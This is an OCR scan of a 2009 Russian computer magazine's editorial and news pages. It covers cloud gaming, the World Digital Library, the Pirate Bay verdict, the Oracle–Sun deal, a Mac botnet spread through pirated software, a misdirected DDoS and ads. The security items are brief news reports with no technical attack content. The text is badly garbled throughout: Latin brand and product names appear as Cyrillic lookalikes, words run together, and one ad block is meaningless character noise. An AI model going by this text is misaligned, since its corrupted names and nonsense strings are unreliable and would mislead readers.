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ІПІГО 

Нучто.у меня хорошая новость. Майский зсу нас 
получился толще апрельского: объем журнала вновь 
составляет 1 44 страницы, а значит, удельное со- 
держание ха ков, ти псов и тр иксов в номере достигло 
своего номинального значения :). Скажу даже больше 
— этот номер мы по максимуму постарались сделать 
интересным и заполненным новой инфой. Вот и 
вскрытая банка сгущенки на обложке — явно неспро- 



ста. Мы разобрались с новой методикой по перехвату 
данных в 55І_-сессиях, представленной ны февраль- 
ском Віаск На! и подготовили для тебя мануал прак- 
тической направленности — можешьлегко проверить 
новый концепт в действии. Только совет: дома и на 
ѵтѵѵаге :). 



Іпікііог, гл. ред.ХІ 
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Сгузіз на нетбуке 
уже реальность 




Правда, было бы здорово, 
если бы самые последние 
и требовательные к железу 
игры можно было бы запускать 
на любом компьютере, прак- 
тически мгновенно? Притом, 
безо всяких апгрейдов, проблем 



с драйверами и настройками! 

То, что совсем недавно казалось 
мечтами, скоро станет реальнос- 
тью. Компания ОпЫѵе уже почти 
готова представить нам новый 
игровой сервис с одноимен- 
ным названием, построенный 
на принципе облачной обработки 
данных. То есть, фактические 
мощности находятся у постав- 
щика услуги, а пользователю 
все предоставляется удаленно, 
как интернет-сервис. Чтобы поиг- 
рать, понадобятся лишь браузер 
и установленный плагин ОпЫѵе. 
Для желающих гамать не на ПК, 
а на ТВ, будет возможность при- 
обрести недорогую приставку. 
Само собой, канал потребуется 



широкий: для 50 — І.бМЬрз, 
а для НО (1 280р] - 5МЬрз. 

Но стоит сказать, что в ОпЫѵе 
разработали свою техноло- 
гию сжатия данных. Задержка 
составляет порядка миллисе- 
кунды и лагов не предвидится. 
Выбор игр, судя по всему, будет 
не мал — соглашения с ОпЫѵе 
уже подписали ЕІесЫопіс АгЫ, 
Еісіоз, Аіагі, ѴѴагпегВгоз и другие 
видные представители геймдева. 
На данный момент проект нахо- 
дится в закрытой бете. Открытое 
тестирование назначено на лето 
(по адресу ѵѵѵѵѵѵ.опііѵе.сопп даже 
можно записаться]. Релиз утехи 
запланирован на конец 2009 
года. 



Подвинься, 

Еигореапа 



Виртуальные двери очень инте- 
ресного проекта — Всемирной 
цифровой библиотеки (ѴѴогЫ 
йідіЫІ ЫЬгагу] — распахнулись 
21-го апреля. Идею создания 
ресурса еще в 2005 году подал 
директор Библиотеки Конгресса 
США Джеймс Биллингтон, а меж- 
дународные организации вроде 
ЮНЕСКО, ООН и ИФЛАс радостью 
ее подхватили. Суть проста — 
свести воедино как можно больше 
библиотек, архивов и иже с ними, 
собрав на одном сайте практи- 
чески все культурное наследие 
мира. К «наследию» отнесли 
рукописи, карты, редкие книги, 



ноты, записи, фильмы, снимки, 
фотографии и архитектурные чер- 
тежи. Это настоящий праздник 
на улице любителей истории! Сайт 
работает на семи языках, среди 
которых есть и русский. Да -да, 
как ни странно, Россия тоже участ- 
вует в благом начинании. На ѵѵѵѵѵѵ. 
уѵсИ.огд нашу страну представ- 
ляют Российская Национальная 
библиотека и Российская 
Государственная библиотека. 
Любопытно и то, что в финанси- 
ровании участвуют такие гиганты 
ІТ, как Соодіе и МісгозоЛ. Первые 
выделили Змлн. долларов, 
вторые — миллион. 



ПОДАННЫМ КОМПАНИИ ЯНДЕКС, 

В РУССКОЙ БЛОГОСФЕРЕУЖЕ 

7.4 МИЛЛИОНА БЛОГОВ. 6.9 МЛН. 

ИЗ НИХ — ДНЕВНИКИ, ОСТАЛЬНОЕ — 
РАЗЛИЧНЫЕ СООБЩЕСТВА. 
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в выигрышном положении 



Зеркальная фотокамера 05000 с уникальным поворотным 
дисплеем и функцией съемки видео в формате НО. 
Новая модель - новые перспективы. 



Основа изображения 
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Реклама. Товар сертифицирован 
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Пишем больше, 

пишем быстрее 

Віи-гау диски все плотнее входят в наш быт. И производители железа 
не отстают, поставляя более совершенные устройства для их чтения 
и записи. Так, компания Ріопеег представила новый привод под номе- 
ром В О Р— 2203, с поддержкой Віи-гау, БУБ и СО. К компьютеру новинка 
подключается через интерфейс 5АТА. Главное достоинство — привод 
умеетзаписывать двухслойные ВБ-В на скорости 8х, и бэкап 50 Гб будет 
занимать примерно полчаса. Вместе с «резаком» поставляется пакет 
программ СуЬегЫпк. Однако цены на «чудеса техники» по-прежнему 
остаются кусачими. В США за новинку придется отдать 250 долларов, 
а что будет на российском рынке — можно только предполагать. 



В ЕВРОПЕ РАСЕВООК — СОЦИАЛЬНАЯ 
СЕТЬ №1 .АВ РОССИИ ОНА 
НАХОДИТСЯ ЛИШЬ НА 7-М МЕСТЕ 
ПО ПОПУЛЯРНОСТИ. 




Блоги замечательных людей 




5.6 миллиардов! 
Продано! 

В прошлом номере мы писали отом, что корпорация ІВМ, кажется, 
не против приобрести 5ип Місгозузіетз. Слухи подтвердились — 
предложение о покупке 5ип за почти 7 млрд, долларов действительно 
было отвергнуто последними. Но после отказа, вызванного, судя 
по всему, недостаточно хорошей ценой, акции 5ип не просто «пошли 
вниз», а буквально рухнули на 25%. Так что, новое предложение, 
поступившее уже от компании 0 га сіе, пришлось весьма кстати. Один 
из крупнейших мировых разработчиков в области систем управле- 
ния БД предложил 5ип 9.5 долларов за акцию. Это всех полностью 
устроило. Очевидно, в 5ип поняли, что время торговаться прошло. 
Сделку планируют оформить окончательно уже этим летом, а итоговая 
сумма составит 5.6 миллиарда долларов (с учетом долга компании — 
7.4 млрд.]. К чему приведет слияние, покажет время, но последствия 



С огромной скоростью сервис для микроблоггинга Тѵѵіііег наращивает 
популярность. Сегодня Іѵѵіііег-аккаунты естьу многих знаменитостей, 
от Бритни Спирс до Барака Обамы, но настоящий рекорд удалось поста- 
вить телеведущей Оп ре Уинфри. Опра оформила первый пост 1 7 апреля, 
и уже через 2 часа у нее было 1 00.000 фоловеров (ака друзей-читателей]. 
На текущий моментэта цифра выросла в пять раз — у Опры уже 505.985 
«последователей». Миссис Уинфри так популярна на Западе, что вдень 
ее регистрации посещаемость Тѵѵіііег подскочила на 24%. Должно быть, 
тысячи домохозяек решили последовать примеру кумира. Посмотреть 
феномен своими глазами можно на ѵѵѵѵѵѵ.ІѵѵіІІег.сот/ОргаЬ . 

А в России президент страны решил завести ЖЖ. Не секрет, что Дмит- 
рий Анатольевич с 2008 года ведет видео-блог на кгетііп.ги . Перенести 
блог главы государства на независимую площадку решили из-за про- 
блем кремлевского сайта (тот не справляется с наплывом посетителей, 
да и скорость обработки комментариев оста вляетжелать лучшего]. Сер- 
вис ЫѵеОоигпаІ был выбран как наиболее популярная в рунете площадка 
для блоггинга. Блогзарегистрирован каксообщество и расположен 
по адресу ЬИрУ/соттипіІѵ.ІіѵещигпаІ.сот/Ыод тесіѵесіеѵ . Ведут его, 
разумеется, модераторы. На ЖЖ президента за прошедшие несколько 
дней подписалось более 5.5тысяч человек, хотя «начинка»журнала — 
не более чем кросспост из ѵѵѵѵѵѵ.Ыод. кгетііп.ги . 

явно будет далеко идущие. В руках Огасіе теперь, по сути, сосредо- 
точены монополия на технологию 5аѵа и разработки 5ип в области 
железа! 
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ЛЕРО СотриЬегз рекомендует ОС \Л/іпс1о\л/з ѴізЪа® Визіпезз 



гэда 



Реклама. Товар сертифицирован. 



Варианты исполнения корпусов 



йЕРО ІМеоз 630 — российский компьютер мирового уровня 



йЕРО МеоБ 630 на базе четырехъядерного процессора ІпЪеІ® Соге™2 Оиасі с технологией ѵРго™ — 
представитель нового поколения корпоративных ПК, обеспечиающих исключительную производительность 
и реальную многозадачность для работы бизнес-приложений и поддерживающих интегрированные 
аппаратные функции управления и безопасности с использованием технологии ІпЪеІ® ѵРго™. 



• Процессор ІпЪеІ® Соге™ 2 Оиасі 

• Подлинная ѴѴіпсІоѵѵз Ѵізіза® Визіпезз 

• Объем оперативной памяти до 4 Гб 

• Объем дискового пространства до 1 Тб 

• Интегрированный графический адаптер или внешняя видеокарта 

• Возможности удаленного мониторинга и администрирования 

• Три варианта исполнения МісІіТоѵѵег, МіпіТоѵѵег, ВтаІІ Рогт РасЪог 

• Выбор конфигурации и размещение заказа на сайте 

• Производство под заказ в течение трех рабочих дней 




Защита. 

Управление. 

V ) 



МЫ ИХ СДЕЛАЛИ! ДЛЯ ВАС! 

Компания йЕРО СотриЪегз, тел. (495) 969-22-22, ѵѵхллл/.сІеросотриЬегз.ги 

Іпіеі, логотип Іпіеі, ІпіеІ Соге, Іпіеі ѵРго, Соге Іпзісіе и ѵРго Іпзісіе являются товарными знаками корпорации Іпіеі в США и других странах. 



Реклама 
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Новый Касіеоп 
с водяным 
охлаждением 



Не успела компания АМО 
сделать заявление о выпуске 
«самой быстрой в мире игровой 
30-карты в категории до $260» 
(АТІ Пабеоп НО 4890], как кор- 
порация ТШ_ уже представила 
публике свой продукт на базе 
нового ОРІІ. Карточка, получив- 
шая название РоѵѵегСоІог І_С5 
Н 04890, не может не понравить- 
ся геймерам — она относится 
клинейке РоѵѵегСоІог ЫдиісІ 
Сооііпд Зоіиііоп (то есть, имеет 
систему водяного охлаждения]. 
Видеокарта занимаеттолько 



один слот и при этом гарантирует 
отличную производительность 
в 30, в сочетании с эффек- 
тивным теплообменом (на 20 
градусов Цельсия эффективнее 
воздушных систем]. Ктомуже, 
благодаря Н20, стало возможно 
повысить частоты СРБ и памяти, 
которые равны 900 и 1000 МГц 
(4000 МГц], соответственно. 
Объем памяти новинки состав- 
ляет 1 Гб (СБИ Р5]. Но за все 
нужно платить, поэтому цена 
РоѵѵегСоІог БС5 НО4890 равна 
уже не 260, а $339. 




ШВЕДСКИЙ НАЦИОНАЛЬНЫЙ МУЗЕЙ НАУКИ И ТЕХНОЛОГИЙ ВЫКУПИЛ 

УП0ЛИЦИИСЕРВЕРТНЕРІКАТЕВАѴ.0К63А$243 ИВЬІСТАВИЛЕГ0 

В КАЧЕСТВЕ ОДНОГО ИЗ «ИЗОБРЕТЕНИЙ, СИЛЬНЕЕ ВСЕГО ПОВЛИЯВШИХ 
НАЖИЗНЬ ЛЮДЕЙ». 



Знание — сила 




Если новость об открытии Всемирной цифро- 
вой библиотеки порадует людей, увлеченных 
историей, то нововведение на видео-хостинге 
ѴоиТиЬе придется по душе всем, кто тянется 
к знаниям. Теперь по адресу ѵѵѵѵѵѵ.ѵоиІиЬе. 
сот/еби можно найти видео-лекции и обучаю- 
щие материалы от лучших мировых колледжей 
и университетов. Здесь представлены и МІТ, 
и Стэндфордский университет, и Беркли, 



и многие другие. Количество роликов, выло- 
женных одним учебным заведением, порой 
достигает нескольких сотен. Зрителю даже 
предлагаются готовые плейлисты с курсами 
натему, например, линейной алгебры или диф- 
ференциальныхуравнений! И самое главное 
— все это великолепие совершенно бесплатно, 
и потребует, разве что, знания английского 
языка. 



боодіе, уходи 



Мыуже не разупоминали: не все 
жители планеты Земля счастливы, 
что Соодіе снимает их дома со сп^- 
ника, а поулицам городов колесит 
гугло-мобиль. Некоторые даже пы- 
талисьоспоритьправо«корпорации 
Зла» публиковать снимки ихжилья 
в Ооодіе Марз через суд, но из этого 
ничего не вышло. Что ж, советуем 
им брать пример сжителей малень- 
кой английской деревушки Броутон. 
Бдительныеангличане, приметив 
машину с камерой Соодіе Зігееі 
Ѵіеѵѵна борту, подняли на ноги всех 
соседей, вооружились, вызвали 



полицию и, в ожидании стражей 
порядка, грудью встали на въезде 
вдеревню.Увидевтакой решитель- 
ный отпор, водитель гугло-мобиля 
не стал дол го думать, а попросту 
развернулся и уехал. И только спустя 
некоторое время население Броуто- 
на поведало прессе, что, оказыва- 
ется, за последние 1.5 месяца у них 
в деревне произошлотри серьезных 
кражи. Перспектива публикации 
в Соодіе Марз фотографий, облег- 
чающихжизнь и без того обнаглев- 
шим ворам, местных совершенно 
не обрадовала. 
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Казнить, нельзя 
помиловать 

В Стокгольме 1 7-го апреля был вынесен приговор по делу 
команды трекера ТЬе Рігаіе Вау (о самом процессе мы подробно 
рассказывали]. И хотя впервые в истории казалось, что борцы 
за свободу информации могут выиграть, чуда не произошло. Все 
трое админов трекера и бизнесмен Карл Лундстрем, вложивший 
в них деньги и предоставивший хостинг, признаны виновными 
в содействии нарушению копирайта. Суд также постановил, что об- 
виняемые действовали как преступная группа и прекрасно знали, 
что способствуют распространению материалов, нарушающих 
авторские права. Все это позволило классифицировать их вину, 
как «тяжкую». Каждому из команды ТРВ дали по году тюрьмы, и обя- 
зали четверку выплатить медиа-магнатам компенсацию в размере 
3.620.000 долларов, разделив эту сумму на троих (по $905 тысяч 
с каждого]. Напомним, что исходно сторона обвинения требовала 
порядка 1 3 млн. долларов. 

Нельзя сказать, что вердикт стал полной неожиданностью — недо- 
оценивать силу антипиратского лобби было бы глупо. Но вот разра- 
зившегося неделю спустя скандала врядли кто-то ожидал. Внезапно 
выяснилось, что судья Томас Нурстрем является активным членом 
с разу трех анти пиратских организаций — ассоциации по защите 
авторских прав Швеции (5РІІ], ассоциации промышленного права 
(5РІР) и ЗШеІзеп.БЕ (ТЬе Іпіегпеі: Іпітазіхисішге Роипбабоп]. Не менее 
интересно и то, что в первой и третьей организациях «засветились» 
другие представители обвинения — Хенрик Понтен, Петер Дановски 
и Моника Вадстед. Админы ТРВ неунывали и сразу после вынесе- 
ния вердикта заявили: «даже проиграв, мы все равно выиграли». 
Аужпосле огласки столь неприятных для обвинения фактов и вовсе 
приободрились. Адвокаты ТЬе Рігаіе Вау готовятапелляции в вышес- 
тоящие инстанции, притом теперь они намереваются не обжаловать 
приговор, а просить его полной отмены и пересмотра дела. Похоже, 
разбирательство действительно растянется на 2-4 года, как и пред- 
полагалось с самого начала. Ну, а «виновникторжества» — трекер, 
в это время будет продолжать работать. Закрыться ТЬеРігаіеВау.огд, 
по мнению ТРВ- четверки, может л ишь в одном случае — если техноло- 
гия ВіЕГоггепІ: морально устареет. 




Щг ЗЭігаІе Шар 



СРЕДНЯЯ СКОРОСТЬ ДОСТУПА 
В ИНТЕРНЕТ В РФ — 410 КБИТ/СЕК. 
В МОСКВЕ И САНКТ-ПЕТЕРБУРГЕ — 

ОКОЛО 7000 КБИТ/СЕК. 




ТВ-Т юнеры Сотрго - эконом иятенег и места 
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Монетизация УоиТиЬе 



Впервые за все годы работы до- 
ходы компании боодіе показали 
негативную динамику. И втрудные 
для себя времена компания обра- 
тила внимание на одно из своих 
самых спорных подразделений — 
УоиТиЬе. Идея получатьсУоиТибе 
деньги исключительно за счет 
рекламы, похоже, себя не оправ- 



дала, или одного этого оказалось 
недостаточно. Исполнительный 
директор Ооодіе Эрик Шмидт 
сообщил, что для УоиТиЬе будет 
разработана система оплаты 
просмотра (рау-рег-ѵіеѵѵ), с целью 
демонстрации на сайте платных 
материалов. Помимотаких мик- 
роплатежей, обещают и другие 



формы подписки. Подробности 
Шмидтобещал сообщить в самом 
скором будущем. Учитывая, что, 
по некоторым подсчетам, содер- 
жаниеУоиТиЬе обходится Ооодіе 
в $753 млн. в год, а доходов сервис 
приносит почти в 3.5 раза меньше, 
такие пертурбации врядли можно 
назвать странными. В Ооодіе 



ломали головы над монетизацией 
УоиТиЬе с момента его покупки, 
то есть с 2006 года. Любопытно 
и то, что совсем недавно ком- 
пания Зопу подтвердила слухи, 
заявив, что действительно ведет 
переговоры с УоиТиЬе о легаль- 
ном размещении на видео-хос- 
тинге полнометражных фильмов. 



В 2008 ГОДУ ДОЛЯ ПРОЦЕССОРОВ ІЫТЕІ. НА РЫНКЕ СОСТАВИЛА 81 . 8 % 
ОТ ОБЩЕМИРОВОГО ОБЪЕМА. 



Отдайте 

обратно! 



Основатели компании Зкуре — 
НикласЗеннстрем и ЯнусФриис 
— продали свое детище компании 
е Вау еще в 2005 году. Оба тогда 
стали миллиардерами, ведь сумма 
сделки была баснословной — 

3.1 миллиарда долларов. Атеперь, 
похоже, Зеннстрем и Фриис 
возжелали выкупить Зкуре обратно. 
Газете ЫеѵѵѴогкТі тез стало 
известно, что авторы Зкуре уже 
говорили с частными инвесторами, 
очевидно, пытаясь найти недоста- 
ющую часть суммы для совершения 
«обратной» сделки. Судя по всему, 
уже ведутся переговоры и непос- 
редственно с самим еВау. И хотя 
обе стороны наотрез отказываются 
комментировать ситуацию, анали- 
тики уже прогнозируют, что сумма 



сделки на сегодняшний день может 
составить порядка $1 .7 млрд. 

Но самое интересное заключается 
в другом — права на пиринговую 
технологию ЧоШсІ, на основе 
которой работаетЗкуре.досихпор 
принадлежатЗеннстрему и Фриису, 
а еВау работаете ней полицензии. 
И сообразительные бизнесмены 
уже сделали «предупредительный 
выстрел» — подали соответствую- 
щий иск, после которого 1 -го апре- 
ля текущего года в Великобритании 
лицензия еВау была аннулирована. 
Чем всезакончится, пока неизвест- 
но, но, учитывая, что еВау давно 
уже не возражает против продажи 
Зкуре, а ЧоШсІ — очень неплохой 
козырь, у Фрииса и Зеннстрема 
может получиться. 



Акела 

промахнулся 




Цитатник всея Рунета — ЬазЬ.огд. 
Ш — оказывается, нетолько со- 
бираетсмешные цитаты, которые 
вотуже 1 .5 года как перестали 
быть смешными, но еще и ге- 
нерирует курьезные ситуации. 
Казус произошел послетого, 
как в «Бездне» появилось пред- 
ложение отанонима положить 
БРоЗ-ом сайттелеканала ТНТ. 
Разумеется, в качестве мести 
за ненавистный «Дом-2». Все бы 




ничего, но провокатора активно 
поддержали, а он, умышленно 
или не очень, «ошибся адресом», 
призвав общественность атако- 
вать совсем не сайттелеканала 
[ іпМѵ.ги ]. а сайт ни в чем не 
повинной голландской логисти- 
ческой компании ТІ\ІТ [ іпГги ]. И, 
разумеется, подтверждая старую 
поговорку про дурака, которого 
заставили богу молиться — сайт 
положили. Хорошо еще, что гол- 



ландцы всего лишьостались 
на час без интернета [ ЫЧрУДпГ 
Ш использовался для выхода 
в и нет из корпоративной сети] 
и не собираются подавать за- 
явление в правоохранительные 
органы. Хотя списокс некото- 
рыми ІР-адресами участников 
атаки уТКІТ на руках, по мнению 
логистиков, «никакого ущерба 
не было», а значит и панику 
поднимать не стоит. 
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Всевидящее око монитора 



Японская компания Еіго Ыапао 
готовится выпуститьдва широко- 
форматных монитора, оснащенных 
датчиком ЕсоѴіеѵѵ. Инфракрасный 
ЕсоѴіеѵѵ способен определить, 
есть ли в радиусе 120 см отэкра- 
на человек. Функция позволит 
монитору автоматически уходить 



в спящий режим, когда пользова- 
теля нет, и «просыпаться» по его 
возвращении, экономя энергию. 
Модель ЕІехВсап ЕѴ2023ѴѴ-Н 
оснащена 20-дюймовой ѴА-па- 
нелью с разрешением 1600x900 
пикселей, а ЕІехЗсап ЕѴ2303ѴѴ-Т - 
23-дюймовой ТЫ-панелью с раз- 



решением 1920x1080 пикселей. 
Помимо встроенных «детекторов 
людей», мониторы укомплектова- 
ны и интересными подставками. 
Так, у старшей модели высота 
подставки регулируется в преде- 
лах 225 мм, что, по мнению спе- 
циалистов Еіго Ыапао, является 



рекордом. Возвращаясь к вопросу 
энергопотребления,— в активном 
режиме мониторы потребляют 18 
и 25 Вт, в то время как в спящем эта 
цифра не превысит и 0.7 Вт. В род- 
ной Японии новинки появятся уже 
в мае по цене 385 и 460 долларов 
США. 



АЗІІЗ ѴѴЬбООдР Ѵ2 - 

больше чем ѴѴі-Рі роутер! 

лА Адаптирован для России 

V Утилита быстрой настройки 
ѴѴі-Рі и Іпіегпеі 



НОВЫЕ ВОЗМОЖНОСТИ 

ЛЕГЕНДАРНОГО РОУТЕРА 

- Русский интерфейс пользователя для 
легкого управления и настройки сети 

-ѴѴі-Рі 125 Мбит/с 

- 2 порта 115В 2.0 для подключения жестких 
дисков, большинства принтеров и МФУ 

- Выделенные порты для подключения 
приставки ІРТѴ 

- АЗІІЗ АЮізк - личный сетевой 
файл-сервер с доступом через Іпіегпеі 



Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 




Горячая линия А$ІІ$: (495) 23-11-999 



Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; Коосіоо ТесИпоІодіез (495) 256-17-31; ОЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТШТѴ-ЕІ.ЕСТК0МІС5 ѵѵш.ігі-еі.ги 



Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесііоп 



ч мг 
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Ищем 10 

отличий 



боодіе запустил в работу новую, очень интересную функцию, 
которая многим покажется знакомой по сайту ТіпЕуе — по- 
иск похожих изображений [ зітіІаг-ітадез.аоодІеІаЬз.сот ]. 
Ксожалению, в отличие оттого же ТіпЕуе, анализ в режиме 
реального времени не предусмотрен, загружать свои кар- 
тинки и искать их аналоги пока нельзя. Вместо этого боодіе 
сначала предложиттебе выполнить обычный поиск по изоб- 
ражениям, затем нужно выбрать наиболее приглянувшийся 
вариант и перейти к поиску похожих на него картинок. Ре- 
зультаты работы сервиса выглядяточень достойно — если 
боодіе и ошибается, то совсем редко. Уже после недолгого 
общения с бітііаг ітадез становится ясно, что наилучшие 
результаты показывают контрастные картинки. Неизвестно, 
планируется ли со временем введение загрузки собствен- 
ных изображений, но определенно — если добавились бы 
фишки Ііпеѵе.сот . цены бы этой функции не было! 



ТЕІ.ЕСЕООВАРНѴ СООБЩАЕТ, ЧТО ДОЛЯ БКУРЕ В МЕЖДУНАРОДНОМ 
-О ГОЛОСОВОМ ТРАФИКЕ ЗА ГОД ВЫРОСЛА НА 41 %, СОСТАВИВ 8% 
ОТОБЩЕГО К0ЛИЧЕСТВАЗВ0НК0В. 




Яблочный 

ботнет 

Мифы о вирусной неуязвимости компьютеров 
Арріе продолжают рушиться на глазах, бтало 
доподлинно известно о создании первого бот- 
нета из Мас’ов, насчитывающего, по некоторым 
данным, почти 20.000 машин. Заражение было 
произведено через раздававшуюся вторрен- 
тах пиратскую версию пакета программ Арріе 
іѴѴогк’09 и стольже нелегальную версию АбоЬе 
Рбоіозбор 654. Не брезгующие пиратским 
софтом яблочники получили с программа- 
ми маленький бонус — троян по имени 65Х. 
Ізегѵісе. бкачанное ими Пб нормально работа- 
ет, но делает Мае’ и частью ботнета, назван- 
ного (явно не без издевки] іВоІпеІ. бозданная 
сеть используется вполне «традиционно» — 
для ОбоЗ-атак и рассылки спама. 
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Новая версия Ог.ѴѴеЬ 
АѴ-Ревк 




В начале апреля компания «Доктор Веб» 
представила новую версию интернет-сервиса 
Ог.ѴѴеЬ АѴ-Безк. С ним сервис-провайдеры 



могут предлагать пользователям антиви- 
русную защиту в качестве услуги. То есть, або- 
ненты сами выбирают свой тарифный план, 
время подписки, уровень информационной 
безопасности, а также могут автоматичес- 
ки продлевать лицензию. Ог.ѴѴеЬ АѴ-Безк 
используюттакие гиганты, как«Корбина 
Телеком», «Билайн», «Стрим-ТВ» и провай- 
деры Украины, Киргизии, Эстонии, Болгарии 
и Казахстана. Свежая версия несет в себе 
все плюсы нового ядра антивируса Ог.ѴѴеЬ 
5.0 — клиентская часть умеет все, что по- 
ложено уметь современному антивирусу, 
и значительно меньше нагружает систему 
(это тоже заслуга ядра]. Провайдеры теперь 
могут создавать любые тарифные пакеты, 
помимо трех базовых (Ог.ѴѴеЬ Классик, Ог.ѴѴеЬ 
Стандарт и Ог.ѴѴеЬ Премиум]; администриро- 
вать Ог.ѴѴеЬ АѴ-Оезк с любого компьютера, 
а не только из офиса; имеют возможность 
предупредить юзера или определенную 
группу юзеров об угрозе, направив им личное 
сообщение. Список поддерживаемых сервер- 
ных систем пополнили РгееВБО 7. 1 , Геб о га 
Соге 10 и системы на основе 0 ЬЬс 2.9. 



ФАС СЧИТАЕТ, ЧТО ДОЛЯ МІСР050РТ В РОССИЙСКОМ 
СЕГМЕНТЕ ОС ПРЕВЫШАЕТ 35%, КОТОРЫЕ 
НЕОБХОДИМЫ ДЛЯ ВНЕСЕНИЯ КОМПАНИИ В РЕЕСТР 
МОНОПОЛИСТОВ. 



Китайские хакеры 
настолько суровы... 




Американское правительство, что называет- 
ся, «жжот». Ну, а как иначе назвать их заявле- 
ние о том, что «предположительно китайские 



хакеры» в который уже раз взломали сеть 
Пентагона и украли несколько терабайт 
данных по проекту боі пТ Зіхіке РідЫег? Цель 
упомянутого проекта — создание самолета 
нового поколения, и стоимость этих разра- 
боток огромна даже по меркам Пентагона, 
не испытывающего недостатка финансирова- 
ния — 300 млрд. долларов. Поймать хакеров 
по горячим следам военным неудалось, 
потому как следы, якобы, оказались крайне 
запутанными, и проследить их удалось только 
до Китая. На самом деле, это мало похоже 
на правду, так как не совсем понятно, зачем 
правительству афишировать та кой «прокол», 
если он на самом деле имел место. Атак- 
же, очень хотелось бы знать, чем же таким 
интересным занимались админы Пентагона, 
что не заметили, каку них из-под носа увели 
несколько терабайт данных? 




Оптимальное 
разрешение 1920x1200, 
удовольствие от НО 
развлечений 



» Уникальный датчик освещения, 

ДНТЛПГГДГТрО;'1*Д Я РМ0СТН іЬнфДнЛ. ПЯЛ, 
окружающій; услонин, Иддгитьніэе шчшлние! 
ітйнйюи-и Лнйрі ш и уменьшен 1 * напряжении 
ггШ. ПОдд^ржн.4 ПйндарТнйІ’О фцрмгзггі 4:3 и 
широкоэкранного 1^:9, 16:10* ІШОх 13004 

> ВСфЮІМЫІйпрюфнсиОМАЛЬНіЫЙ ТВ-тюнер 
А пн дысокоилчрггарннп-га прин-мд 

4М0ПЕЛ'ДОСмО Ш-Е ИЗ ГІА.Ч1І 

^ Интерфейс "ріи^э & Ріа/ 1 йсі ннгёходиіюсги 

уСтвнл-впинагы ПО 

>> Режим 1/4 и 1/9 РІР для ТВ и ПН 

> новейших телевизионных 

игроки у. клчгплеи 5/ХіЧОЖ 16Щ для 

Ніішіучижк нтгчлтнжни ен иі р 



МЩ? . . ЛѴЛѴ Р >СІЕІ. ЕСГП 

ВДНІЦМ# р ИіЯЕМ 
Мігі іѵ '.ирр^'і і,*Нч(«гч с шг 
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^ КеМ IX 2009 

В Москве состояласьуже традиционная конференция 
для веб-разаботчиков и дизайнеров ВеМІХ. В отличие 
от прошлого года, когда ВеМІХ проходил в Колонном 
зале Дома союзов, гостей на этот раз принимал выста- 
вочный центр « И нфоп ростра нство», и число участников 
составило всего 300 человек (против прошлогодних 
1 .500]. Однако это никак не сказалось на мероприятии 
— менее интересным и увлекательным ВеМІХ не стал. 
Столицу второй раз подряд посетил генеральный 
директор МісгозоІІ Стив Балмер (притом, на глобальной 
МІХ09, прошедшей в Лас-Вегасе, Балмера не было]. Он 
рассказал о новых возможностях и развитии технологий 
ЗіІѵегІідЫ: и ІЕ 8, приведя в пример реализацию всех 
типов расширений ІЕ 8 порталом МаіІ.Ри и открытие 
на ВиТиЬе площадки для тестирования ЗіІѵегІідЫ:. 

Не забыли и про ѴѴіпбоѵѵз Бегѵег и ѴѴіпбоѵѵз Агиге, 
поговорив об их основных функциях и возможностях. 
Затем последовала череда вопросов-ответов, втом 
числе, заданных через ТѵѵіЛег. Стив вновь просил всех 
писать ему на зЫѵеЬйтісгозоЛ.сопп; назвал ІЕ 8 самым 
безопасным браузером; заметил, что после выхода игр 
в интернет мир превратился в один большой ѴѴагсгаЛ; 
пообещал упростить нетолько язык пользовательских 
соглашений, но и саму политику лицензирования; и со- 
общил, что в ближайшиетри года МісгозоІІ: собирается 
потратить в России порядка 300 млн. долларов. Более 
подробно ознакомиться с материалами конференции 
можно на сайте ѵѵѵѵѵѵ.геппіх.ги . 
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Технология ЕІазЬ сегодня практически 
монополист рынка, несмотря на нали- 
чие конкурентов. Но компании АбоЬе, 
видимо, недостаточно того, что она 
прочно оккупировала ПК идобралась 
до смартфонов. Теперь в АбоЬе вспом- 
нили о существовании другой техники, 
например, бытовой. На конференции 
І\ІАВ ЗЬоѵѵ публике представили новую 
разработку — ЕІазЬ, оптимизирован- 
ный для телевизоров, приставок и Віи - 
гау плееров. Коалиция, собирающаяся 
продвигать это в массы, выглядит 



более чем внушительно. Среди про- 
изводителей микросхем отметились 
Вгоабсот, Іпіеі и ЗТМісгоеІесІгопісз, 
а среди прочих партнеров — Сотсазі:, 
Бізпеу Іпіегасііѵе и ІЧеѵѵ Ѵогк Тітез. 
Первые телевизоры, поддерживающие 
ЕІазЬ, должны появиться в продаже 
уже к концу этого года. Благодаря 
ореп Егатеѵѵогк, на ТВ можно будет 
запустить любое из уже существующих 
Еіазб- приложений, что обещает оста- 
вить конкурентов далеко позади. 



Маленький и прочный 



Компания НР продолжает расширять 
свою линейку Міпі. Очередным попол- 
нением стал ноутбук НР Міпі 2140. Ма- 
шинка базируется на процессоре Іпіеі 
Аіот 1 .6 ГГц. Это позволяетзначительно 
снизитьэнергозатраты и уровень шума, 
а 10.1 -дюймовый экран НР Іііитііііе І_ЕО 
со светодиодной подсветкой (соотно- 
шение сторон 16:9] порадуетакриловой 
защитой от царапин. Последнее весьма 
актуально для компактного ПК, который 
везде таскают с собой. Корпус ноутбука 
выполнен из анодированного алю- 
миния, что также делает его не только 
прочным, легким и стильным, но и за- 
щищает от «бытовых травм». Клави- 
ши почти полноразмерной 
(92%] клавиатуры 
защищены от из- 
носа покрытием 
НР БигаКеуз, 
а внутри корпуса Міпі 
2140 притаился 3-координатный 
цифровой акселерометр. При ударе 



или встряске он остановит работу 
дискового накопителя. Портативный ПК 
оснащен модулем ѴѴі-Еі Сегііііеб ѴѴБАІЧ, 
опциональным модулем Віиеіооіб 2.0 
и интегрированной веб-камерой с раз- 
решением ѴОА. Рекомендованная цена 
на Міпі 2140 составляет 1 5.800 рублей. 




Хочешь слушать? 

Плати 



Кризискнам приходит, кризис к нам 
приходит. Популярнейший сервис 
БазІ.Іт становится платным. Решение 
вызревало давно, и после первого 
объявления на данную тему в официаль- 
ном блоге негодованию пользователей 
не было предела. Поначалу спорный 
шаг даже хотели отложить на неопреде- 
ленное время — слишком уж негативно 
отреагировало комьюнити. Но не про- 
шло и месяца, как руководство БазІ.Іт 
все же решилось. Сервис станет 



платным для всех стран, кроме США, 
Великобритании и Германии. Бесплатно 
теперь можно прослушать только ЗОтре- 
